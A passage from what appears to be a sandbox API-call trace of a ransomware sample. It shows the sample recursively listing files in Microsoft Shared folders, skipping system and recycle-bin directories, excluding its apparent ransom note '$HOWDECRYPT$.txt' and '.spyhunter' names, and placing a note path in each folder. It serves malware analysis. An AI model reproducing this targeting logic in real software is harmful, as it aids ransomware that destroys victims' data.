lstrlenW (lpString="$Recycle.bin") returned 12 [0091.610] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="System Volume Information") returned 1 [0091.611] lstrlenW (lpString="System Volume Information") returned 25 [0091.611] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb") returned 68 [0091.611] StrStrIW (lpFirst="vstoee90.tlb", lpSrch=".spyhunter") returned 0x0 [0091.611] lstrcmpW (lpString1="vstoee90.tlb", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.611] lstrcmpW (lpString1="vstoee90.tlb", lpString2="_uninstalling_.png") returned 1 [0091.611] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb") returned 68 [0091.611] GetProcessHeap () returned 0x2c0000 [0091.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x37e200 [0091.611] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1550) returned 0x3824f8 [0091.611] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.611] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.611] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\$HOWDECRYPT$.txt") returned 72 [0091.611] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\$HOWDECRYPT$.txt") returned 72 [0091.611] GetProcessHeap () returned 0x2c0000 [0091.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346c68 [0091.612] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1558) returned 0x3824f8 [0091.613] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.613] lstrcmpiW (lpString1="Web Folders", lpString2="Windows") returned -1 [0091.613] lstrlenW (lpString="Windows") returned 7 [0091.613] lstrcmpiW (lpString1="Web Folders", lpString2="$Recycle.bin") returned 1 [0091.613] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.613] lstrcmpiW (lpString1="Web Folders", lpString2="System Volume Information") returned 1 [0091.613] lstrlenW (lpString="System Volume Information") returned 25 [0091.613] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders") returned 62 [0091.613] lstrcmpW (lpString1="Web Folders", lpString2=".") returned 1 [0091.613] lstrcmpW (lpString1="Web Folders", lpString2="..") returned 1 [0091.614] GetProcessHeap () returned 0x2c0000 [0091.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.614] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*") returned 64 [0091.614] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.624] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.624] lstrlenW (lpString="Windows") returned 7 [0091.624] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.624] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.624] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.624] lstrlenW (lpString="System Volume Information") returned 25 [0091.624] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\.") returned 64 [0091.624] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.624] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.624] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.624] lstrlenW (lpString="Windows") returned 7 [0091.624] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.625] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.625] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.625] lstrlenW (lpString="System Volume Information") returned 25 [0091.625] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\..") returned 65 [0091.625] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.625] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.625] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.625] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0091.625] lstrlenW (lpString="Windows") returned 7 [0091.625] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0091.625] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.625] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0091.625] lstrlenW (lpString="System Volume Information") returned 25 [0091.625] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033") returned 67 [0091.625] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0091.625] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0091.625] GetProcessHeap () returned 0x2c0000 [0091.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.626] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*") returned 69 [0091.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.626] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.626] lstrlenW (lpString="Windows") returned 7 [0091.626] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.626] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.626] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.626] lstrlenW (lpString="System Volume Information") returned 25 [0091.626] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\.") returned 69 [0091.627] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.627] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.627] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.627] lstrlenW (lpString="Windows") returned 7 [0091.627] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.627] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.627] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.627] lstrlenW (lpString="System Volume Information") returned 25 [0091.627] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\..") returned 70 [0091.627] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.627] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.627] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.627] lstrcmpiW (lpString1="MSOSVINT.DLL", lpString2="Windows") returned -1 [0091.627] lstrlenW (lpString="Windows") returned 7 [0091.627] lstrcmpiW (lpString1="MSOSVINT.DLL", lpString2="$Recycle.bin") returned 1 [0091.627] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.627] lstrcmpiW (lpString1="MSOSVINT.DLL", lpString2="System Volume Information") returned -1 [0091.627] lstrlenW (lpString="System Volume Information") returned 25 [0091.627] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL") returned 80 [0091.628] StrStrIW (lpFirst="MSOSVINT.DLL", lpSrch=".spyhunter") returned 0x0 [0091.628] lstrcmpW (lpString1="MSOSVINT.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.628] lstrcmpW (lpString1="MSOSVINT.DLL", lpString2="_uninstalling_.png") returned 1 [0091.628] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL") returned 80 [0091.628] GetProcessHeap () returned 0x2c0000 [0091.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f058 [0091.628] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1560) returned 0x3824f8 [0091.628] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.628] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.628] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\$HOWDECRYPT$.txt") returned 84 [0091.628] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\$HOWDECRYPT$.txt") returned 84 [0091.628] GetProcessHeap () returned 0x2c0000 [0091.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x3555a0 [0091.628] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1568) returned 0x3824f8 [0091.628] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.628] lstrcmpiW (lpString1="MSOSV.DLL", lpString2="Windows") returned -1 [0091.628] lstrlenW (lpString="Windows") returned 7 [0091.628] lstrcmpiW (lpString1="MSOSV.DLL", lpString2="$Recycle.bin") returned 1 [0091.628] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.628] lstrcmpiW (lpString1="MSOSV.DLL", lpString2="System Volume Information") returned -1 [0091.629] lstrlenW (lpString="System Volume Information") returned 25 [0091.629] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL") returned 72 [0091.629] StrStrIW (lpFirst="MSOSV.DLL", lpSrch=".spyhunter") returned 0x0 [0091.629] lstrcmpW (lpString1="MSOSV.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.629] lstrcmpW (lpString1="MSOSV.DLL", lpString2="_uninstalling_.png") returned 1 [0091.629] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL") returned 72 [0091.629] GetProcessHeap () returned 0x2c0000 [0091.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346728 [0091.629] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1570) returned 0x3824f8 [0091.629] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.629] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.629] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\$HOWDECRYPT$.txt") returned 79 [0091.629] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\$HOWDECRYPT$.txt") returned 79 [0091.629] GetProcessHeap () returned 0x2c0000 [0091.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3780d8 [0091.629] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1578) returned 0x3824f8 [0091.630] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.630] lstrcmpiW (lpString1="Web Server Extensions", lpString2="Windows") returned -1 [0091.630] lstrlenW (lpString="Windows") returned 7 [0091.630] lstrcmpiW (lpString1="Web Server Extensions", lpString2="$Recycle.bin") returned 1 [0091.631] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.631] lstrcmpiW (lpString1="Web Server Extensions", lpString2="System Volume Information") returned 1 [0091.631] lstrlenW (lpString="System Volume Information") returned 25 [0091.631] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions") returned 72 [0091.631] lstrcmpW (lpString1="Web Server Extensions", lpString2=".") returned 1 [0091.631] lstrcmpW (lpString1="Web Server Extensions", lpString2="..") returned 1 [0091.631] GetProcessHeap () returned 0x2c0000 [0091.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.631] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*") returned 74 [0091.631] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.652] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.652] lstrlenW (lpString="Windows") returned 7 [0091.653] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.653] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.653] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.653] lstrlenW (lpString="System Volume Information") returned 25 [0091.653] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\.") returned 74 [0091.653] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.653] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.653] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.653] lstrlenW (lpString="Windows") returned 7 [0091.653] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.653] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.653] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.653] lstrlenW (lpString="System Volume Information") returned 25 [0091.653] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\..") returned 75 [0091.653] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.653] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.653] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.653] lstrcmpiW (lpString1="14", lpString2="Windows") returned -1 [0091.653] lstrlenW (lpString="Windows") returned 7 [0091.653] lstrcmpiW (lpString1="14", lpString2="$Recycle.bin") returned 1 [0091.653] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.653] lstrcmpiW (lpString1="14", lpString2="System Volume Information") returned -1 [0091.653] lstrlenW (lpString="System Volume Information") returned 25 [0091.653] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14") returned 75 [0091.653] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0091.654] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0091.654] GetProcessHeap () returned 0x2c0000 [0091.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.654] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*") returned 77 [0091.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.654] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.654] lstrlenW (lpString="Windows") returned 7 [0091.654] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.654] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.654] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.654] lstrlenW (lpString="System Volume Information") returned 25 [0091.655] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\.") returned 77 [0091.655] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.655] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.655] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.655] lstrlenW (lpString="Windows") returned 7 [0091.655] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.655] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.655] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.655] lstrlenW (lpString="System Volume Information") returned 25 [0091.655] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\..") returned 78 [0091.655] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.655] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.655] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.656] lstrcmpiW (lpString1="BIN", lpString2="Windows") returned -1 [0091.656] lstrlenW (lpString="Windows") returned 7 [0091.656] lstrcmpiW (lpString1="BIN", lpString2="$Recycle.bin") returned 1 [0091.656] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.656] lstrcmpiW (lpString1="BIN", lpString2="System Volume Information") returned -1 [0091.656] lstrlenW (lpString="System Volume Information") returned 25 [0091.656] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN") returned 79 [0091.656] lstrcmpW (lpString1="BIN", lpString2=".") returned 1 [0091.656] lstrcmpW (lpString1="BIN", lpString2="..") returned 1 [0091.656] GetProcessHeap () returned 0x2c0000 [0091.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0091.657] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*") returned 81 [0091.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0091.658] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.658] lstrlenW (lpString="Windows") returned 7 [0091.658] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.658] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.658] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.658] lstrlenW (lpString="System Volume Information") returned 25 [0091.658] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\.") returned 81 [0091.658] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.658] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.659] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.659] lstrlenW (lpString="Windows") returned 7 [0091.659] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.659] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.659] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.659] lstrlenW (lpString="System Volume Information") returned 25 [0091.659] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\..") returned 82 [0091.659] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.659] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.659] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.659] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0091.659] lstrlenW (lpString="Windows") returned 7 [0091.659] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0091.659] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.659] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0091.659] lstrlenW (lpString="System Volume Information") returned 25 [0091.659] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033") returned 84 [0091.659] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0091.659] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0091.659] GetProcessHeap () returned 0x2c0000 [0091.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0091.660] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*") returned 86 [0091.660] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*", lpFindFileData=0x298e608 | out: lpFindFileData=0x298e608) returned 0x336020 [0091.660] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.660] lstrlenW (lpString="Windows") returned 7 [0091.660] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.660] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.660] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.660] lstrlenW (lpString="System Volume Information") returned 25 [0091.660] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\.") returned 86 [0091.660] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.660] FindNextFileW (in: hFindFile=0x336020, lpFindFileData=0x298e608 | out: lpFindFileData=0x298e608) returned 1 [0091.660] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.660] lstrlenW (lpString="Windows") returned 7 [0091.660] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.660] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.660] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.660] lstrlenW (lpString="System Volume Information") returned 25 [0091.660] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\..") returned 87 [0091.661] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.661] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.661] FindNextFileW (in: hFindFile=0x336020, lpFindFileData=0x298e608 | out: lpFindFileData=0x298e608) returned 1 [0091.661] lstrcmpiW (lpString1="FPEXT.MSG", lpString2="Windows") returned -1 [0091.661] lstrlenW (lpString="Windows") returned 7 [0091.661] lstrcmpiW (lpString1="FPEXT.MSG", lpString2="$Recycle.bin") returned 1 [0091.661] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.661] lstrcmpiW (lpString1="FPEXT.MSG", lpString2="System Volume Information") returned -1 [0091.661] lstrlenW (lpString="System Volume Information") returned 25 [0091.661] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 94 [0091.661] StrStrIW (lpFirst="FPEXT.MSG", lpSrch=".spyhunter") returned 0x0 [0091.661] lstrcmpW (lpString1="FPEXT.MSG", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.661] lstrcmpW (lpString1="FPEXT.MSG", lpString2="_uninstalling_.png") returned 1 [0091.661] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 94 [0091.661] GetProcessHeap () returned 0x2c0000 [0091.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfe) returned 0x37a750 [0091.661] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1580) returned 0x3824f8 [0091.661] FindNextFileW (in: hFindFile=0x336020, lpFindFileData=0x298e608 | out: lpFindFileData=0x298e608) returned 0 [0091.661] FindClose (in: hFindFile=0x336020 | out: hFindFile=0x336020) returned 1 [0091.661] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\$HOWDECRYPT$.txt") returned 101 [0091.661] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\$HOWDECRYPT$.txt") returned 101 [0091.662] GetProcessHeap () returned 0x2c0000 [0091.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10c) returned 0x375928 [0091.662] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1588) returned 0x3824f8 [0091.662] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.662] lstrcmpiW (lpString1="FPSRVUTL.DLL", lpString2="Windows") returned -1 [0091.662] lstrlenW (lpString="Windows") returned 7 [0091.662] lstrcmpiW (lpString1="FPSRVUTL.DLL", lpString2="$Recycle.bin") returned 1 [0091.662] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.662] lstrcmpiW (lpString1="FPSRVUTL.DLL", lpString2="System Volume Information") returned -1 [0091.662] lstrlenW (lpString="System Volume Information") returned 25 [0091.662] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned 92 [0091.662] StrStrIW (lpFirst="FPSRVUTL.DLL", lpSrch=".spyhunter") returned 0x0 [0091.662] lstrcmpW (lpString1="FPSRVUTL.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.662] lstrcmpW (lpString1="FPSRVUTL.DLL", lpString2="_uninstalling_.png") returned 1 [0091.662] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned 92 [0091.662] GetProcessHeap () returned 0x2c0000 [0091.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x383a88 [0091.662] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1590) returned 0x2c310e0 [0091.662] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.662] lstrcmpiW (lpString1="FPWEC.DLL", lpString2="Windows") 